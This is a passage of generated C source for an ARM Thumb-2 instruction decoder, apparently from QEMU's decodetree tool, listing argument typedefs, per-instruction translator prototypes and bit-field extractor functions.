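 * decodetree input syntax (field layout approximate, not the exact
 * source line), a pattern such as
 *
 *     AND_rrri  1110101 0000 . .... 0 ... .... .... ....  @s_rrr_shi
 *
 * is what decodetree.py expands into the matching switch arm, the
 * disas_t32_extract_s_rrr_shi() field extractor and the trans_AND_rrri()
 * prototype seen below.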
*/ typedef struct { int cond; int imm; } arg_ci; typedef struct { int rd; int sysm; } arg_disas_t3227; typedef struct { int mask; int rn; int sysm; } arg_disas_t3228; typedef struct { int A; int T; int rd; int rn; } arg_disas_t3230; typedef struct { int imm; int p; int rn; int rt; int rt2; int u; int w; } arg_ldst_ri2; typedef struct { int rm; int rn; } arg_tbranch; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_s_rrr_shi arg_ORN_rrri; static bool trans_ORN_rrri(DisasContext *ctx, arg_ORN_rrri *a); typedef arg_s_rrr_shi arg_TEQ_xrri; static bool trans_TEQ_xrri(DisasContext *ctx, arg_TEQ_xrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_pkh arg_PKH; static bool trans_PKH(DisasContext *ctx, arg_PKH *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rrr_shi arg_RSB_rrri; static bool trans_RSB_rrri(DisasContext *ctx, arg_RSB_rrri *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rri_rot arg_TST_xri; static bool trans_TST_xri(DisasContext *ctx, arg_TST_xri *a); typedef arg_s_rri_rot arg_AND_rri; static bool trans_AND_rri(DisasContext *ctx, arg_AND_rri *a); typedef arg_s_rri_rot arg_BIC_rri; static bool trans_BIC_rri(DisasContext *ctx, arg_BIC_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_ORR_rri; static bool trans_ORR_rri(DisasContext *ctx, arg_ORR_rri *a); typedef arg_s_rri_rot arg_MVN_rxi; static bool trans_MVN_rxi(DisasContext *ctx, arg_MVN_rxi *a); typedef arg_s_rri_rot arg_ORN_rri; static bool trans_ORN_rri(DisasContext *ctx, arg_ORN_rri *a); typedef arg_s_rri_rot arg_TEQ_xri; static bool trans_TEQ_xri(DisasContext *ctx, arg_TEQ_xri *a); typedef arg_s_rri_rot arg_EOR_rri; static bool trans_EOR_rri(DisasContext *ctx, arg_EOR_rri *a); typedef arg_s_rri_rot arg_CMN_xri; static bool trans_CMN_xri(DisasContext *ctx, arg_CMN_xri *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_s_rri_rot arg_ADC_rri; static bool trans_ADC_rri(DisasContext *ctx, arg_ADC_rri *a); typedef arg_s_rri_rot 
arg_SBC_rri; static bool trans_SBC_rri(DisasContext *ctx, arg_SBC_rri *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_ri arg_ADR; static bool trans_ADR(DisasContext *ctx, arg_ADR *a); typedef arg_ri arg_MOVW; static bool trans_MOVW(DisasContext *ctx, arg_MOVW *a); typedef arg_ri arg_MOVT; static bool trans_MOVT(DisasContext *ctx, arg_MOVT *a); typedef arg_sat arg_SSAT16; static bool trans_SSAT16(DisasContext *ctx, arg_SSAT16 *a); typedef arg_sat arg_SSAT; static bool trans_SSAT(DisasContext *ctx, arg_SSAT *a); typedef arg_sat arg_USAT16; static bool trans_USAT16(DisasContext *ctx, arg_USAT16 *a); typedef arg_sat arg_USAT; static bool trans_USAT(DisasContext *ctx, arg_USAT *a); typedef arg_bfx arg_SBFX; static bool trans_SBFX(DisasContext *ctx, arg_SBFX *a); typedef arg_bfx arg_UBFX; static bool trans_UBFX(DisasContext *ctx, arg_UBFX *a); typedef arg_bfi arg_BFCI; static bool trans_BFCI(DisasContext *ctx, arg_BFCI *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrrr arg_MLA; static bool trans_MLA(DisasContext *ctx, arg_MLA *a); typedef arg_rrrr arg_MLS; static bool trans_MLS(DisasContext *ctx, arg_MLS *a); typedef arg_s_rrrr arg_SMULL; static bool trans_SMULL(DisasContext *ctx, arg_SMULL *a); typedef arg_s_rrrr arg_UMULL; static bool trans_UMULL(DisasContext *ctx, arg_UMULL *a); typedef arg_s_rrrr arg_SMLAL; static bool trans_SMLAL(DisasContext *ctx, arg_SMLAL *a); typedef arg_s_rrrr arg_UMLAL; static bool trans_UMLAL(DisasContext *ctx, arg_UMLAL *a); typedef arg_rrrr arg_UMAAL; static bool trans_UMAAL(DisasContext *ctx, arg_UMAAL *a); typedef arg_rrrr arg_SMULWB; static bool trans_SMULWB(DisasContext *ctx, arg_SMULWB *a); typedef arg_rrrr arg_SMLAWB; static bool trans_SMLAWB(DisasContext *ctx, arg_SMLAWB *a); typedef arg_rrrr arg_SMULWT; static bool trans_SMULWT(DisasContext *ctx, arg_SMULWT *a); typedef arg_rrrr arg_SMLAWT; static bool trans_SMLAWT(DisasContext *ctx, arg_SMLAWT *a); typedef arg_rrrr arg_SMULBB; static bool trans_SMULBB(DisasContext *ctx, arg_SMULBB *a); typedef arg_rrrr arg_SMLABB; static bool trans_SMLABB(DisasContext *ctx, arg_SMLABB *a); typedef arg_rrrr arg_SMULBT; static bool trans_SMULBT(DisasContext *ctx, arg_SMULBT *a); typedef arg_rrrr arg_SMLABT; static bool trans_SMLABT(DisasContext *ctx, arg_SMLABT *a); typedef arg_rrrr arg_SMULTB; static bool trans_SMULTB(DisasContext *ctx, arg_SMULTB *a); typedef arg_rrrr arg_SMLATB; static bool trans_SMLATB(DisasContext *ctx, arg_SMLATB *a); typedef arg_rrrr arg_SMULTT; static bool trans_SMULTT(DisasContext *ctx, arg_SMULTT *a); typedef arg_rrrr arg_SMLATT; static bool trans_SMLATT(DisasContext *ctx, arg_SMLATT *a); typedef arg_rrrr arg_SMLALBB; static bool trans_SMLALBB(DisasContext *ctx, arg_SMLALBB *a); typedef arg_rrrr arg_SMLALBT; static bool trans_SMLALBT(DisasContext *ctx, arg_SMLALBT *a); typedef arg_rrrr arg_SMLALTB; static bool trans_SMLALTB(DisasContext *ctx, arg_SMLALTB *a); typedef arg_rrrr arg_SMLALTT; static bool trans_SMLALTT(DisasContext *ctx, arg_SMLALTT *a); typedef arg_rrrr arg_USADA8; static bool trans_USADA8(DisasContext *ctx, arg_USADA8 *a); typedef arg_rrrr arg_SMLAD; static bool trans_SMLAD(DisasContext *ctx, arg_SMLAD *a); typedef arg_rrrr arg_SMLADX; static bool trans_SMLADX(DisasContext 
*ctx, arg_SMLADX *a); typedef arg_rrrr arg_SMLSD; static bool trans_SMLSD(DisasContext *ctx, arg_SMLSD *a); typedef arg_rrrr arg_SMLSDX; static bool trans_SMLSDX(DisasContext *ctx, arg_SMLSDX *a); typedef arg_rrrr arg_SMLALD; static bool trans_SMLALD(DisasContext *ctx, arg_SMLALD *a); typedef arg_rrrr arg_SMLALDX; static bool trans_SMLALDX(DisasContext *ctx, arg_SMLALDX *a); typedef arg_rrrr arg_SMLSLD; static bool trans_SMLSLD(DisasContext *ctx, arg_SMLSLD *a); typedef arg_rrrr arg_SMLSLDX; static bool trans_SMLSLDX(DisasContext *ctx, arg_SMLSLDX *a); typedef arg_rrrr arg_SMMLA; static bool trans_SMMLA(DisasContext *ctx, arg_SMMLA *a); typedef arg_rrrr arg_SMMLAR; static bool trans_SMMLAR(DisasContext *ctx, arg_SMMLAR *a); typedef arg_rrrr arg_SMMLS; static bool trans_SMMLS(DisasContext *ctx, arg_SMMLS *a); typedef arg_rrrr arg_SMMLSR; static bool trans_SMMLSR(DisasContext *ctx, arg_SMMLSR *a); typedef arg_rrr arg_SDIV; static bool trans_SDIV(DisasContext *ctx, arg_SDIV *a); typedef arg_rrr arg_UDIV; static bool trans_UDIV(DisasContext *ctx, arg_UDIV *a); typedef arg_rrr arg_QADD; static bool trans_QADD(DisasContext *ctx, arg_QADD *a); typedef arg_rrr arg_QSUB; static bool trans_QSUB(DisasContext *ctx, arg_QSUB *a); typedef arg_rrr arg_QDADD; static bool trans_QDADD(DisasContext *ctx, arg_QDADD *a); typedef arg_rrr arg_QDSUB; static bool trans_QDSUB(DisasContext *ctx, arg_QDSUB *a); typedef arg_rrr arg_CRC32B; static bool trans_CRC32B(DisasContext *ctx, arg_CRC32B *a); typedef arg_rrr arg_CRC32H; static bool trans_CRC32H(DisasContext *ctx, arg_CRC32H *a); typedef arg_rrr arg_CRC32W; static bool trans_CRC32W(DisasContext *ctx, arg_CRC32W *a); typedef arg_rrr arg_CRC32CB; static bool trans_CRC32CB(DisasContext *ctx, arg_CRC32CB *a); typedef arg_rrr arg_CRC32CH; static bool trans_CRC32CH(DisasContext *ctx, arg_CRC32CH *a); typedef arg_rrr arg_CRC32CW; static bool trans_CRC32CW(DisasContext *ctx, arg_CRC32CW *a); typedef arg_rrr arg_SEL; static bool trans_SEL(DisasContext *ctx, arg_SEL *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_RBIT; static bool trans_RBIT(DisasContext *ctx, arg_RBIT *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_rr arg_CLZ; static bool trans_CLZ(DisasContext *ctx, arg_CLZ *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_empty arg_CLREX; static bool trans_CLREX(DisasContext *ctx, arg_CLREX *a); typedef arg_empty arg_DSB; static bool trans_DSB(DisasContext *ctx, arg_DSB *a); typedef arg_empty arg_DMB; static bool trans_DMB(DisasContext *ctx, arg_DMB *a); typedef arg_empty arg_ISB; static bool trans_ISB(DisasContext *ctx, arg_ISB *a); typedef arg_empty arg_SB; static bool trans_SB(DisasContext *ctx, arg_SB *a); typedef arg_mrs_bank arg_MRS_bank; static bool trans_MRS_bank(DisasContext *ctx, arg_MRS_bank *a); typedef arg_mrs_reg arg_MRS_reg; static bool trans_MRS_reg(DisasContext *ctx, arg_MRS_reg *a); typedef arg_disas_t3227 arg_MRS_v7m; static bool trans_MRS_v7m(DisasContext *ctx, arg_MRS_v7m *a); typedef 
arg_msr_bank arg_MSR_bank; static bool trans_MSR_bank(DisasContext *ctx, arg_MSR_bank *a); typedef arg_msr_reg arg_MSR_reg; static bool trans_MSR_reg(DisasContext *ctx, arg_MSR_reg *a); typedef arg_disas_t3228 arg_MSR_v7m; static bool trans_MSR_v7m(DisasContext *ctx, arg_MSR_v7m *a); typedef arg_r arg_BXJ; static bool trans_BXJ(DisasContext *ctx, arg_BXJ *a); typedef arg_empty arg_ERET; static bool trans_ERET(DisasContext *ctx, arg_ERET *a); typedef arg_i arg_SMC; static bool trans_SMC(DisasContext *ctx, arg_SMC *a); typedef arg_i arg_HVC; static bool trans_HVC(DisasContext *ctx, arg_HVC *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_ci arg_B_cond_thumb; static bool trans_B_cond_thumb(DisasContext *ctx, arg_B_cond_thumb *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_STRBT_ri; static bool trans_STRBT_ri(DisasContext *ctx, arg_STRBT_ri *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_STRHT_ri; static bool trans_STRHT_ri(DisasContext *ctx, arg_STRHT_ri *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_STRT_ri; static bool trans_STRT_ri(DisasContext *ctx, arg_STRT_ri *a); typedef arg_ldst_ri arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_LDRBT_ri; static bool trans_LDRBT_ri(DisasContext *ctx, arg_LDRBT_ri *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ldst_ri arg_LDRHT_ri; static bool trans_LDRHT_ri(DisasContext *ctx, arg_LDRHT_ri *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri arg_LDRT_ri; static bool trans_LDRT_ri(DisasContext *ctx, arg_LDRT_ri *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_ri arg_LDRSB_ri; static bool trans_LDRSB_ri(DisasContext *ctx, arg_LDRSB_ri *a); typedef arg_ldst_ri arg_LDRSBT_ri; static bool trans_LDRSBT_ri(DisasContext *ctx, arg_LDRSBT_ri *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_ri arg_LDRSH_ri; static bool trans_LDRSH_ri(DisasContext *ctx, arg_LDRSH_ri *a); typedef arg_ldst_ri arg_LDRSHT_ri; static bool trans_LDRSHT_ri(DisasContext *ctx, arg_LDRSHT_ri *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_ri2 arg_STRD_ri_t32; static bool trans_STRD_ri_t32(DisasContext *ctx, arg_STRD_ri_t32 *a); typedef arg_ldst_ri2 arg_LDRD_ri_t32; static bool trans_LDRD_ri_t32(DisasContext *ctx, arg_LDRD_ri_t32 *a); typedef arg_empty arg_SG; static bool trans_SG(DisasContext *ctx, arg_SG *a); typedef arg_disas_t3230 arg_TT; static bool trans_TT(DisasContext *ctx, arg_TT *a); typedef arg_strex arg_STREX; static bool trans_STREX(DisasContext *ctx, arg_STREX *a); 
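/*
 * The typedef/prototype pairs in this block alias a handful of shared
 * argument layouts (arg_strex, arg_ldrex, arg_rrr, ...) to one name per
 * instruction, so every translator gets a self-documenting signature
 * while the decoder only needs to fill in a few struct shapes. A minimal
 * sketch of the consumer side, with a hypothetical body shown purely for
 * illustration (op_strex is an assumed helper, not defined here):
 *
 *     static bool trans_STREXB(DisasContext *s, arg_STREXB *a)
 *     {
 *         // arg_STREXB is just arg_strex: rn, rt, rt2, rd, imm
 *         return op_strex(s, a, MO_8, false);
 *     }
 */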
typedef arg_strex arg_STREXB; static bool trans_STREXB(DisasContext *ctx, arg_STREXB *a); typedef arg_strex arg_STREXH; static bool trans_STREXH(DisasContext *ctx, arg_STREXH *a); typedef arg_strex arg_STREXD_t32; static bool trans_STREXD_t32(DisasContext *ctx, arg_STREXD_t32 *a); typedef arg_strex arg_STLEX; static bool trans_STLEX(DisasContext *ctx, arg_STLEX *a); typedef arg_strex arg_STLEXB; static bool trans_STLEXB(DisasContext *ctx, arg_STLEXB *a); typedef arg_strex arg_STLEXH; static bool trans_STLEXH(DisasContext *ctx, arg_STLEXH *a); typedef arg_strex arg_STLEXD_t32; static bool trans_STLEXD_t32(DisasContext *ctx, arg_STLEXD_t32 *a); typedef arg_ldrex arg_STL; static bool trans_STL(DisasContext *ctx, arg_STL *a); typedef arg_ldrex arg_STLB; static bool trans_STLB(DisasContext *ctx, arg_STLB *a); typedef arg_ldrex arg_STLH; static bool trans_STLH(DisasContext *ctx, arg_STLH *a); typedef arg_ldrex arg_LDREX; static bool trans_LDREX(DisasContext *ctx, arg_LDREX *a); typedef arg_ldrex arg_LDREXB; static bool trans_LDREXB(DisasContext *ctx, arg_LDREXB *a); typedef arg_ldrex arg_LDREXH; static bool trans_LDREXH(DisasContext *ctx, arg_LDREXH *a); typedef arg_ldrex arg_LDREXD_t32; static bool trans_LDREXD_t32(DisasContext *ctx, arg_LDREXD_t32 *a); typedef arg_ldrex arg_LDAEX; static bool trans_LDAEX(DisasContext *ctx, arg_LDAEX *a); typedef arg_ldrex arg_LDAEXB; static bool trans_LDAEXB(DisasContext *ctx, arg_LDAEXB *a); typedef arg_ldrex arg_LDAEXH; static bool trans_LDAEXH(DisasContext *ctx, arg_LDAEXH *a); typedef arg_ldrex arg_LDAEXD_t32; static bool trans_LDAEXD_t32(DisasContext *ctx, arg_LDAEXD_t32 *a); typedef arg_ldrex arg_LDA; static bool trans_LDA(DisasContext *ctx, arg_LDA *a); typedef arg_ldrex arg_LDAB; static bool trans_LDAB(DisasContext *ctx, arg_LDAB *a); typedef arg_ldrex arg_LDAH; static bool trans_LDAH(DisasContext *ctx, arg_LDAH *a); typedef arg_tbranch arg_TBB; static bool trans_TBB(DisasContext *ctx, arg_TBB *a); typedef arg_tbranch arg_TBH; static bool trans_TBH(DisasContext *ctx, arg_TBH *a); typedef arg_rrr arg_SADD8; static bool trans_SADD8(DisasContext *ctx, arg_SADD8 *a); typedef arg_rrr arg_QADD8; static bool trans_QADD8(DisasContext *ctx, arg_QADD8 *a); typedef arg_rrr arg_SHADD8; static bool trans_SHADD8(DisasContext *ctx, arg_SHADD8 *a); typedef arg_rrr arg_UADD8; static bool trans_UADD8(DisasContext *ctx, arg_UADD8 *a); typedef arg_rrr arg_UQADD8; static bool trans_UQADD8(DisasContext *ctx, arg_UQADD8 *a); typedef arg_rrr arg_UHADD8; static bool trans_UHADD8(DisasContext *ctx, arg_UHADD8 *a); typedef arg_rrr arg_SADD16; static bool trans_SADD16(DisasContext *ctx, arg_SADD16 *a); typedef arg_rrr arg_QADD16; static bool trans_QADD16(DisasContext *ctx, arg_QADD16 *a); typedef arg_rrr arg_SHADD16; static bool trans_SHADD16(DisasContext *ctx, arg_SHADD16 *a); typedef arg_rrr arg_UADD16; static bool trans_UADD16(DisasContext *ctx, arg_UADD16 *a); typedef arg_rrr arg_UQADD16; static bool trans_UQADD16(DisasContext *ctx, arg_UQADD16 *a); typedef arg_rrr arg_UHADD16; static bool trans_UHADD16(DisasContext *ctx, arg_UHADD16 *a); typedef arg_rrr arg_SASX; static bool trans_SASX(DisasContext *ctx, arg_SASX *a); typedef arg_rrr arg_QASX; static bool trans_QASX(DisasContext *ctx, arg_QASX *a); typedef arg_rrr arg_SHASX; static bool trans_SHASX(DisasContext *ctx, arg_SHASX *a); typedef arg_rrr arg_UASX; static bool trans_UASX(DisasContext *ctx, arg_UASX *a); typedef arg_rrr arg_UQASX; static bool trans_UQASX(DisasContext *ctx, arg_UQASX *a); typedef arg_rrr arg_UHASX; 
static bool trans_UHASX(DisasContext *ctx, arg_UHASX *a); typedef arg_rrr arg_SSUB8; static bool trans_SSUB8(DisasContext *ctx, arg_SSUB8 *a); typedef arg_rrr arg_QSUB8; static bool trans_QSUB8(DisasContext *ctx, arg_QSUB8 *a); typedef arg_rrr arg_SHSUB8; static bool trans_SHSUB8(DisasContext *ctx, arg_SHSUB8 *a); typedef arg_rrr arg_USUB8; static bool trans_USUB8(DisasContext *ctx, arg_USUB8 *a); typedef arg_rrr arg_UQSUB8; static bool trans_UQSUB8(DisasContext *ctx, arg_UQSUB8 *a); typedef arg_rrr arg_UHSUB8; static bool trans_UHSUB8(DisasContext *ctx, arg_UHSUB8 *a); typedef arg_rrr arg_SSUB16; static bool trans_SSUB16(DisasContext *ctx, arg_SSUB16 *a); typedef arg_rrr arg_QSUB16; static bool trans_QSUB16(DisasContext *ctx, arg_QSUB16 *a); typedef arg_rrr arg_SHSUB16; static bool trans_SHSUB16(DisasContext *ctx, arg_SHSUB16 *a); typedef arg_rrr arg_USUB16; static bool trans_USUB16(DisasContext *ctx, arg_USUB16 *a); typedef arg_rrr arg_UQSUB16; static bool trans_UQSUB16(DisasContext *ctx, arg_UQSUB16 *a); typedef arg_rrr arg_UHSUB16; static bool trans_UHSUB16(DisasContext *ctx, arg_UHSUB16 *a); typedef arg_rrr arg_SSAX; static bool trans_SSAX(DisasContext *ctx, arg_SSAX *a); typedef arg_rrr arg_QSAX; static bool trans_QSAX(DisasContext *ctx, arg_QSAX *a); typedef arg_rrr arg_SHSAX; static bool trans_SHSAX(DisasContext *ctx, arg_SHSAX *a); typedef arg_rrr arg_USAX; static bool trans_USAX(DisasContext *ctx, arg_USAX *a); typedef arg_rrr arg_UQSAX; static bool trans_UQSAX(DisasContext *ctx, arg_UQSAX *a); typedef arg_rrr arg_UHSAX; static bool trans_UHSAX(DisasContext *ctx, arg_UHSAX *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); typedef arg_rrr_rot arg_SXTAB16; static bool trans_SXTAB16(DisasContext *ctx, arg_SXTAB16 *a); typedef arg_rrr_rot arg_UXTAB16; static bool trans_UXTAB16(DisasContext *ctx, arg_UXTAB16 *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_ldst_block arg_STM_t32; static bool trans_STM_t32(DisasContext *ctx, arg_STM_t32 *a); typedef arg_ldst_block arg_LDM_t32; static bool trans_LDM_t32(DisasContext *ctx, arg_LDM_t32 *a); typedef arg_rfe arg_RFE; static bool trans_RFE(DisasContext *ctx, arg_RFE *a); typedef arg_srs arg_SRS; static bool trans_SRS(DisasContext *ctx, arg_SRS *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BL; static bool trans_BL(DisasContext *ctx, arg_BL *a); typedef arg_i arg_BLX_i; static bool trans_BLX_i(DisasContext *ctx, arg_BLX_i *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_t32_extract_S_xri_rot(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->imm = t32_expandimm_imm(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->rot = t32_expandimm_rot(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); a->s = 1; a->rd = 0; } static void disas_t32_extract_S_xrr_shi(DisasContext *ctx, arg_s_rrr_shi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->shty = extract32(insn, 4, 2); a->rm = extract32(insn, 0, 4); a->shim = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); a->s = 1; a->rd = 0; } static void 
disas_t32_extract_bfi(DisasContext *ctx, arg_bfi *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->msb = extract32(insn, 0, 5); a->lsb = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_bfx(DisasContext *ctx, arg_bfx *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->widthm1 = extract32(insn, 0, 5); a->lsb = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_branch24(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = t32_branch24(ctx, deposit32(deposit32(deposit32(deposit32(extract32(insn, 0, 11), 11, 21, extract32(insn, 16, 10)), 21, 11, extract32(insn, 11, 1)), 22, 10, extract32(insn, 13, 1)), 23, 9, sextract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_10(DisasContext *ctx, arg_ri *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->imm = negate(ctx, deposit32(deposit32(extract32(insn, 0, 8), 8, 24, extract32(insn, 12, 3)), 11, 21, extract32(insn, 26, 1))); } static void disas_t32_extract_disas_t32_Fmt_22(DisasContext *ctx, arg_empty *a, uint32_t insn) { } static void disas_t32_extract_disas_t32_Fmt_23(DisasContext *ctx, arg_cps *a, uint32_t insn) { a->imod = extract32(insn, 9, 2); a->M = extract32(insn, 8, 1); a->A = extract32(insn, 7, 1); a->I = extract32(insn, 6, 1); a->F = extract32(insn, 5, 1); a->mode = extract32(insn, 0, 5); } static void disas_t32_extract_disas_t32_Fmt_24(DisasContext *ctx, arg_mrs_bank *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); a->sysm = deposit32(extract32(insn, 16, 4), 4, 28, extract32(insn, 4, 1)); } static void disas_t32_extract_disas_t32_Fmt_25(DisasContext *ctx, arg_mrs_reg *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rd = extract32(insn, 8, 4); } static void disas_t32_extract_disas_t32_Fmt_26(DisasContext *ctx, arg_disas_t3227 *a, uint32_t insn) { a->rd = extract32(insn, 8, 4); a->sysm = extract32(insn, 0, 8); } static void disas_t32_extract_disas_t32_Fmt_27(DisasContext *ctx, arg_msr_bank *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->sysm = deposit32(extract32(insn, 8, 4), 4, 28, extract32(insn, 4, 1)); } static void disas_t32_extract_disas_t32_Fmt_28(DisasContext *ctx, arg_msr_reg *a, uint32_t insn) { a->r = extract32(insn, 20, 1); a->rn = extract32(insn, 16, 4); a->mask = extract32(insn, 8, 4); } static void disas_t32_extract_disas_t32_Fmt_29(DisasContext *ctx, arg_disas_t3228 *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->mask = extract32(insn, 10, 2); a->sysm = extract32(insn, 0, 8); } static void disas_t32_extract_disas_t32_Fmt_3(DisasContext *ctx, arg_pkh *a, uint32_t insn) { a->rn = extract32(insn, 16, 4); a->rd = extract32(insn, 8, 4); a->tb = extract32(insn, 5, 1); a->rm = extract32(insn, 0, 4); a->imm = deposit32(extract32(insn, 6, 2), 2, 30, extract32(insn, 12, 3)); } static void disas_t32_extract_disas_t32_Fmt_30(DisasContext *ctx, arg_r *a, uint32_t insn) { a->rm = extract32(insn, 16, 4); } static void disas_t32_extract_disas_t32_Fmt_31(DisasContext *ctx, arg_s_rri_rot *a, uint32_t insn) { a->imm = extract32(insn, 0, 8); a->rot = 0; a->s = 1; a->rd = 15; a->rn = 14; } static void disas_t32_extract_disas_t32_Fmt_32(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = extract32(insn, 16, 4); } static void disas_t32_extract_disas_t32_Fmt_33(DisasContext *ctx, arg_i *a, uint32_t insn) { a->imm = deposit32(extract32(insn, 0, 12), 12, 20, extract32(insn, 16, 
